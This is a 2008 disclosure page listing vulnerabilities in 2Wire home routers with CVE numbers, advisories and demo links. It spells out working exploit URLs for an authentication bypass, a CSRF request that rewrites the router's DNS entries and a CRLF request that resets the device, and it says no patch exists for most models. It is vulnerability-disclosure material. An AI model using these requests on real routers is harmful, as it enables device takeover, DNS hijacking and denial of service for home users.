──────────────────────────────────────────────────────────────────────────────
  VULNERABILITIES IN 2WIRE ROUTERS
  Advisories, Demos & Exploits
──────────────────────────────────────────────────────────────────────────────

[ Authentication Bypass ]
  Impact: HIGH [░░▒▒▓▓██]
  CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4388
  Demo (WARNING: changes your password): http://2wire-poc.blogspot.com
  Exploit:

    http://gateway.2wire.net/xslt?PAGE=H04

[ Cross Site Request Forgery ]
  Impact: HIGH [░░▒▒▓▓██]
  Author: hkm
  Advisory: http://www.hakim.ws/textos/2wirexsrf.txt
  CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4387
  Demo (adds a DNS entry): http://www.hakim.ws/2wire/demodns.html
  Exploit (dns):

    http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=<DOMINIO>&ADDR=<IP>

[ CRLF Denial of Service ]
  Impact: MEDIUM [░░▒▒▓▓  ]
  Author: Preth00nker
  Advisory: http://www.hakim.ws/cum/index.php?topic=15162.msg86315#msg86315
  CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4523
  Demo (resets your router): http://www.hakim.ws/2wire/crlfdos.html
  Exploit (dns):

    http://gateway.2wire.net/xslt?PAGE=%0D&0A

[ Configuration Disclosure ]
  Impact: MEDIUM [░░▒▒▓▓  ]
  Author: Javier Liendo
  Advisory: (mirror) http://www.hakim.ws/2wire/urlmagico.txt
  Exploit withheld

──────────────────────────────────────────────────────────────────────────────
These vulnerabilities are present in routers "with firmware < 5.29.135.5".
I have never come across a single router that is not vulnerable.
──────────────────────────────────────────────────────────────────────────────
28/03/2008@12:12pm Prodigy support says that no update exists.
28/03/2008@12:27pm 2wire confirms that the firmware exists only for the 2701.
──────────────────────────────────────────────────────────────────────────────
hkm 28/03/2008
design © CraCkEr 2008